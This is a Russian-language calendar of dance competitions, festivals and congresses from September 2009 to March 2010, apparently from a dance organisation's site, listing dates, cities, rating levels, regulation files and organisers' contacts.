Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

14.03.2010—14.03.2010 РОССИЙСКИЙ ТУРНИР ПО СОВРЕМЕННЫМ ТАНЦЕВАЛЬНЫМ НАПРАВЛЕНИЯМ «МЕЧТА ДАНС-2010». Волгоградская область
Волгоград
Межрегиональный Кубок

Танцевально-спортивный клуб «Мечта».
Руководитель: Кривошеев В.Н.

Танцевально-спортивный клуб Maxima.
Руководитель: Нагов В.С.

Тел./факс/автоответчик (+7-442) 40-13-18, моб. +7-927-504-33-24

Эл. почта: Tsk-maxima81@mail.ru

программа турнира 14 марта 2010г..doc

ПОЛОЖЕНИЕ турнира 14 марта 2010 г..doc

13.03.2010—14.03.2010 Кубок Северо-Западного Федерального Округа по Oriental Dance. 13-14 марта Республика Карелия
Петрозаводск
Рейтинг Б

моб: 8-911-400-10-04, 8-911-400-10-03, 8-911-401-45-50

 

Положение_Кубка_СЗФО!.doc

13.03.2010—14.03.2010 Конкурс-Фестиваль «Ступеньки успеха» (отборочный на Российский «4 сезона») Нижегородская область
Нижний Новгород
Городской Кубок
www.artsfera.org

Эл. почта: artsferann@rambler.ru
13.03.2010—14.03.2010 Открытый Рейтинговый Чемпионат Самарской области.Чемпионат Поволжья – взрослые: классика, фольк, шоу Самарская область
Тольятти
Рейтинг Б

Полож Самара.doc

13.03.2010—13.03.2010 3-конкурс современых танцев "Кубок Авачинской бухты" Камчатский край
Петропавловск-Камчатский
Региональный Кубок

ПОЛОЖЕНИЕ Кубок Авачинской бухты 2010.doc

12.03.2010—12.03.2010 Заседание Президиума московского отделения ОРТО Москва
Москва
07.03.2010—07.03.2010 Фестиваль молодежной танцевальной культуры «Восходящие звезды» по хипу-хопу, диско, техно, Street Show и многоборью, 4-й этап Москва
Москва
07.03.2010—07.03.2010 Всероссийский турнир "Танцевальный триумф". Волгоградская область
Волгоград
Фестиваль

Марков Андрей

Моб.: +7-902-382-09-00 

Эл. почта: Foxtrot34@mail.ru

06.03.2010—07.03.2010 Кубок ЦФО по Pole dance и Strip dance Орловская область
Орел
Региональный Кубок

Тел.: (+7-4862) 750-815

Моб.: +7-903-882-32-38

Эл. почта: mina_78@list.ru

Общероссийская танцевальная организация.doc 2.doc

05.03.2010—07.03.2010 ПОЛОЖЕНИЕ о проведении Мировой Серии по танцевальному шоу, народному танцу и модерну Республика Мордовия
Саранск
Чемпионат Европы

Положение Мировой Серии, 2010.doc

220h170.jpg

05.03.2010—07.03.2010 VII Кубок Главы Республики Мордовия по современным танцевальным направлениям Республика Мордовия
Саранск
Рейтинг А
Чемпионат России

Полное Положение Кубка на подпись - 2010.doc

28.02.2010—28.02.2010 Чемпионат Башкортостана по современным танцевальным направлениям Республика Башкортостан
Уфа
Предварительная регистрация по эл. почте: dance.rb@mail.ru

до 24 часов 19 февраля 2010 г.

Тел.: +7-927-236-77-06; (+7-347) 266-77-06; +7-927-321-94-25

фото конгресс-холла.jpg .jpg

ПОЛОЖЕНИЕ ЧЕМПИОНАТА.doc

ФОРМА_ЗАЯВКИ_НА_УЧАСТИЕ.doc

23.02.2010—23.02.2010 Концерт лучших исполнителей и коллективов Москвы посвященный, Дню защитника отечества Москва
Москва
23.02.2010—23.02.2010 Московская Олимпиада искусств. Московский Tap Dance фестиваль. Москва
Москва
22.02.2010—22.02.2010 Северная Пальмира - конкурс хореографического искусства Ленинградская область
Санкт-Петербург
Фестиваль

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

22 февраля Северная Пальмира конкурс.doc

20.02.2010—22.02.2010 Фестиваль «Таланты» по сценическим и парным танцам, 1-й этап Москва
Москва
20.02.2010—21.02.2010 Чемпионат Московской области по современным танцам Москва
Москва
Региональный Кубок
20.02.2010—21.02.2010 «Северная пальмира» — Чемпионат России 2010 г. среди любителей Oriental, классики и народного танца. Рейтинг «А» Санкт-Петербург
Санкт-Петербург
Рейтинг А

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32, (+7-812) 922-54-82

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

Чемпионат России oriental 20-21 февр 2010.doc

20.02.2010—21.02.2010 Чемпионат Башкортостана по современным танцевальным направлениям Агинский Бурятский АО
Уфа

POLOWENIE_HEMPIONATA.doc

14.02.2010—14.02.2010 Российский конкурс по Belly Dance, 1-й этап. Гран При Москвы Москва
Москва
Городской Кубок
14.02.2010—14.02.2010 «Дебют» — конкурс восточного танца среди начинающих (Oriental) Ленинградская область
Санкт-Петербург
Фестиваль

г. Санкт-Петербург, ул. Полтавская, д.12, оф. 137

Культурный центр ГУВД Санкт-Петербурга

Тел.: (+7-812) 717-13-32

Моб.: +7-905-276-40-97

Эл. почта: ralifs@yandex.ru

13.02.2010—14.02.2010 Российский конкурс-фестиваль "Таланты", Гран-При г. Нижнего Новгорода, 1 этап Нижегородская область
Нижний Новгород
Фестиваль

Положение_таланты2010.doc

13.02.2010—13.02.2010 Московский международный фестиваль Фламенко, Болливуд и Трайбл Москва
Москва
09.02.2010—14.02.2010 9-й Международный Конгресс учителей танцев «Танцевальная Трилогия» под эгидой Танцевального Совета ЮНЕСКО Москва
Москва
Конгресс
07.02.2010—07.02.2010 Первенство Башкирии "Цветы Евразии" Республика Башкортостан
Уфа
Чемпионат России
Первенство России
Президент Федерации — Хуснутдинова Людмила Равилевна, моб. тел.: +7-927-230-77-64
Председатель Правления — Максютова Ирина Александровна, моб. тел .+7-917-412-33-15
Эл. почта: diva_ufa@mail.ru, marselirina@mai.ru
Сайт: www.monista.ru, www.ortodance.ru

Polowenie_7_fevr_2010_Ufa.doc

31.01.2010—31.01.2010 Всероссийский конкурс по народным направлениям «Тулица-2010». Кубок ЦФО по народному танцу. Тульская область
Тула
Межрегиональный Кубок

Президент «Федерации эстрадного
и современного танца ТО»:
Ольга Чекмазова, моб.: +7-903-421-88-88
Секретарь:
Татьяна Баринова, моб.: +7-910-160-85-58

ТУЛИЦА -2010 г.ПОЛОЖЕНИЕ.doc

24.01.2010—24.01.2010 Обучающий фестиваль-конкурс «ДЕБЮТ» по хип-хоп, диско, техно, хаус, электрик, street show, 2-й этап. Кубок Москвы по баттлам. Москва
Москва
Городской Кубок
23.01.2010—23.01.2010 3-й этап — Фестиваль молодежной танцевальной культуры «Восходящие звезды» Москва
Москва
23.01.2010—23.01.2010 Обучающий фестиваль-конкурс «ДЕБЮТ» для начинающих танцоров по танцевальному шоу, 2-й этап. Фолк, Балет, Классика, Strip Pl Москва
Москва
22.01.2010—23.01.2010 Конкурс-фестиваль танцев народов мира "Золотая хохлома", Чемпионат Поволжья по танцу живота Нижегородская область
Нижний Новгород
Рейтинг Б
mayatcilina@rambler.ru

ЧемпионатПоволжья+народный.doc

16.01.2010—17.01.2010 Кубок Мира по парным танцам, Конгресс по социальным парным танцам. Москва
Москва
Чемпионат Мира
16.01.2010—17.01.2010 «Кубок Русских Царей». Конкурс ПРО-ЭМ. Чемпионат России и Первенство России по парным танцам. Москва
Москва
Первенство России
07.01.2010—11.01.2010 Зимние Учебно-методические Сборы для тренеров, судей и хореографов-постановщиков Танца. Самарская область
Саратов
Конвенция

Вице-Президент ОО ТО «ФСТСО» БАХАРЕВ Дмитрий Викторович

Тел.: +7-917-164-88-76

Эл. почта: DjViBach@mail.ru

26.12.2009—26.12.2009 Конкурс среди молодежных клубов Street Dance «Другой формат» Москва
Москва
Межклубный Кубок
23.12.2009—27.12.2009 Чемпионат Мира по Хип-хопу, Электрик буги и Брейк Данс Москва
Польша
Чемпионат Мира
20.12.2009—20.12.2009 Вручение ежегодных номинаций московского региона за сезон 2008—2009 гг. Москва
Москва
20.12.2009—20.12.2009 Открытый Чемпионат Москвы по Pole Dance и эротическому танцевальному шоу. Российский рейтинг. Strip Plastic Москва
Москва
Городской Кубок
20.12.2009—20.12.2009 Обучающий фестиваль-конкурс «ДЕБЮТ» для начинающих танцоров по танцевальному шоу, 1-й этап Москва
Москва
20.12.2009—20.12.2009 Рейтинг России по Go-Go, R&B, Тектоник Москва
Москва
Первенство России
20.12.2009—20.12.2009 Auto Party для Московского отделения ОРТО. Шоу тренеров Москва
Москва
20.12.2009—20.12.2009 Концерт коллективов и солистов восточного танца «Звезды Москвы и Московской области-2009» Московская область
Москва
Фестиваль

Моб. тел.: +7-916-456-78-45

Эл. почта: mansura@bk.ru

Zvezdy_M_i_MO.doc

18.12.2009—20.12.2009 Точное время и место проведения Первенства России по танцу живота Республика Мордовия
Саранск
Чемпионат России

Первенство России по танцу живота.doc

18.12.2009—20.12.2009 I Олимпиада Искусств Поволжья Республика Мордовия
Саранск

Olimpiada_Povolwqq,_polowenie.doc

18.12.2009—18.12.2009 Заседание Президиума московского отделения ОРТО Москва
Москва
13.12.2009—13.12.2009 Звезды Belly Dance Москвы и Московской области. Концерт Москва
Москва
Городской Кубок
13.12.2009—13.12.2009 Фестиваль «Таланты» по сценическим танцам, 4-й этап. Открытый Чемпионат Москвы по Акробатическому танцу, Мажореткам и парным тан Москва
Москва
Городской Кубок
12.12.2009—13.12.2009 Кубок «Динамо» по современным танцам Москва
Москва
Внутриклубный Кубок
11.12.2009—11.12.2009 Чемпионат Мира по Аргентинскому танго Москва
Австрия
08.12.2009—13.12.2009 Открытый международный конкурс Dance Week Москва
Миколайки, Польша
Чемпионат Мира
06.12.2009—06.12.2009 Обучающий фестиваль-конкурс «ДЕБЮТ» и конкурс 1 и 2 лиг танцоров Belly Dance «Золотая лестница» Москва
Красноармейск
Фестиваль
06.12.2009—06.12.2009 Обучающий фестиваль-конкурс «ДЕБЮТ» по хип-хоп, диско, техно, хаус, электрик, street show. Кубок Москвы по баттлам. 1-й этап Москва
Москва
Городской Кубок
Фестиваль
05.12.2009—05.12.2009 Чемпионат Европы по Belly Dance классика Москва
Минск Беларусь
Чемпионат Европы
01.12.2009—06.12.2009 Украинская танцевальная Олимпиада – все направления Москва
Тернополь Украина
Олимпиада
01.12.2009—05.12.2009 Чемпионат Мира по степу Москва
Риза Германия
Чемпионат Мира
30.11.2009—30.11.2009 Чемпионат Европы по Техно Москва
Тернополь Украина
Чемпионат Европы
29.11.2009—29.11.2009 Чемпионат Мира по Belly Dance Шоу Москва
Тернополь Украина
Чемпионат Мира
29.11.2009—29.11.2009 Конкурс среди молодежных клубов Street Dance «Другой формат» Москва
Москва
Межклубный Кубок
28.11.2009—29.11.2009 Соревнования среди начинающих танцоров по BELLY DANCE, HIP-HOP, BREAK DANCE на призы Союза «Корпорация Марков и К» Оренбургская область
Оренбург

28-29_noqbrq_2009_g..doc

28.11.2009—28.11.2009 Чемпионат Мира по Бачата и Диско Фоксу Москва
Москва
Чемпионат Мира
23.11.2009—28.11.2009 Чемпионат Мира по Танцевальному шоу Москва
Риза Германия
Чемпионат Мира
22.11.2009—22.11.2009 Танцевальный калейдоскоп Белгородская область
Астрахань
Городской Кубок
Моб. тел.: +7-927-556-51-79

Приглашение  на  Танцевальный Калейдоскоп 2009 с кремлем.doc

21.11.2009—22.11.2009 Чемпионат Европы по Belly Dance шоу, фолк Москва
Казань
Чемпионат Европы
15.11.2009—15.11.2009 4-й этап Гран При Московского региона по Belly Dance Москва
Москва
Региональный Кубок
13.11.2009—15.11.2009 Первый Московский фестиваль Диско. Рейтинг Б по Хип-хопу и Диско. Чемпионат России среди студентов по всем современным танцам Москва
Москва
Рейтинг Б
Чемпионат России
Фестиваль
09.11.2009—13.11.2009 Обучающие учебно-методические курсы для педагогов Belly Dance Москва
Москва
Мастер-класс
08.11.2009—08.11.2009 Московский Фестиваль Искусств, 2-й этап Москва
Москва
Фестиваль
07.11.2009—08.11.2009 Аттестация судей Московского региона, собрание и аттестация организаторов мероприятий Москва
Москва
04.11.2009—04.11.2009 Фестиваль молодежной танцевальной культуры «Восходящие звезды» — Хип-хоп, Диско, Хаус, Техно, Street show. 2-й этап Москва
Москва
Фестиваль
31.10.2009—23.02.2010 Фестиваль-конкурс "Таланты"Орла и Орловской области 1-ый этап Орловская область
Орел
Областной конкурс

Положение Таланты 1 Орел.doc

31.10.2009—31.10.2009 Фестиваль-конкурс «Таланты» по сценическим и парным танцам, 3-й этап Москва
Москва
Фестиваль
25.10.2009—25.10.2009 Гран-При Московского региона по Belly Dance, 3-й этап Москва
Москва
Региональный Кубок
24.10.2009—25.10.2009 Кубок «Арбат-2009» по Street Dance — Хип-хоп, Диско, Техно, хаус. Чемпионат Москвы по Электро Данс, Go-Go, R&B Москва
Москва
Городской Кубок
18.10.2009—18.10.2009 Конкурс среди молодежных клубов Street Dance «Другой формат» Москва
Москва
Межклубный Кубок
18.10.2009—18.10.2009 Московский Фестиваль Искусств, 1-й этап Москва
Москва
Фестиваль
18.10.2009—18.10.2009 Конкурс по Восточным танцам «Золотая лестница». Гала-концерт Москва
Москва
17.10.2009—17.10.2009 Международный обучающий конгресс по Танцевальному шоу, заседание комитета по танцевальному шоу, джазу, модерну Москва
Москва
Конгресс
10.10.2009—11.10.2009 Чемпионат Стран СНГ по современным танцам Москва
Белгород
Чемпионат Европы
Чемпионат Азии
03.10.2009—03.10.2009 Фестиваль молодежной танцевальной культуры «Восходящие звезды» по Хипу-Хопу, Диско, Техно, Street show и многоборью. 1-й этап Москва
Москва
Фестиваль
02.10.2009—04.10.2009 Чемпионат Европы по Мажореткам Москва
Кастела, Хорватия
Чемпионат Европы
01.10.2009—01.10.2009 Фестиваль-конкурс "Таланты"Орла и Орловской области 1-ый этап Орловская область
Орел
Областной конкурс

Положение Таланты 1 Орел.doc

26.09.2009—27.09.2009 Чемпионат Европы по Черлидингу Москва
Франция
Чемпионат Европы
26.09.2009—26.09.2009 Конкурс среди молодежных клубов Street Dance «Другой формат» Москва
Москва
Межклубный Кубок
20.09.2009—21.09.2009 Конгресс по мажореткам Москва
Москва
Конгресс
20.09.2009—21.09.2009 Первый Международный конгресс по Черлидингу Москва
Москва
Конгресс
ОРТО
20.09.2009—20.09.2009 Общее собрание руководителей коллективов Московского региона Москва
Москва
20.09.2009—20.09.2009 Первый региональный Фестиваль-конкурс «ОРТО открывает сезон». Фестиваль Международной Детской лиги Восточного танца Москва
Москва
Фестиваль
19.09.2009—19.09.2009 Открытый Чемпионат Москвы по Крамп, New Style, Хаус, Рагга. Баттлы 1х1, 2х2. Open Street Dance Festival Москва
Москва
Городской Кубок
15.09.2009—16.09.2009 Конференция производителей товаров для черлидинга Москва
Анкор, США
Конгресс
11.09.2009—13.09.2009 Конгресс NBTA Москва
Эйдховен, Нидерланды
Конгресс
09.09.2009—09.09.2009 Заседание Президиума московского отделения ОРТО Москва
Москва
08.09.2009—13.09.2009 Чемпионат Мира по Диско Disco World Москва
Братислава
Чемпионат Мира

Версия для печати